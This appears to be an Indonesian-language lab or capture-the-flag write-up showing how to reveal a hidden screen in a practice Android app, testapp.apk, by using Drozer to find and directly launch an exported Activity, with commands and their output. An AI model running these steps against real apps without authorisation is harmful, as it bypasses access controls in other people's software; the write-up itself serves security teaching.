Masalah

Pada aplikasi testapp.apk terdapat Intent yang tersembunyi, coba ungkap Intent tersebut dengan melewati proteksi Activity ini.

Penyelesaian

Untuk melakukan pengujian aplikasi Android, siapkan berkas testapp.apk dan instalasi pada emulator Android.

> adb install testapp.apk

Jalankan Drozer dengan perintah.

> drozer console connect

Kemudian cari package com.isi.testapp dengan perintah.

dz> run app.package.list -f testapp

Untuk melihat informasi dasar bisa menggunakan perintah.

dz> run app.package.info -a com.isi.testapp
Package: com.isi.testapp
  Application Label: testapp
  Process Name: com.isi.testapp
  Version: 1.0
  Data Directory: /data/data/com.isi.testapp
  APK Path: /data/app/com.isi.testapp-1/base.apk
  UID: 10062
  GID: None
  Shared Libraries: null
  Shared User ID: null
  Uses Permissions:
  - None
  Defines Permissions:
  - None

Identifikasi Attack Surface dengan perintah.

dz> run app.package.attacksurface com.isi.testapp
Attack Surface:
  2 activities exported
  0 broadcast receivers exported
  0 content providers exported
  0 services exported
    is debuggable

Untuk mengetahui activity yang telah diekspor bisa menggunakan perintah ini.

dz> run app.activity.info -a com.isi.testapp
Package: com.isi.testapp
  com.isi.testapp.MainActivity
    Permission: null
  com.isi.testapp.Welcome
    Permission: null

Untuk menampilkan Intent yang tersembunyi pada emulator bisa menggunakan perintah ini.

dz> run app.activity.start –component com.isi.testapp com.isi.testapp.Welcome

Ini disebabkan oleh komponen android:exported yang bernilai true pada berkas AndroidManifest.xml

Referensi

http://resources.infosecinstitute.com/android-hacking-security-part-13-introduction-drozer/

Drozer

Masalah

Penyelesaian

Referensi

results matching ""

No results matching ""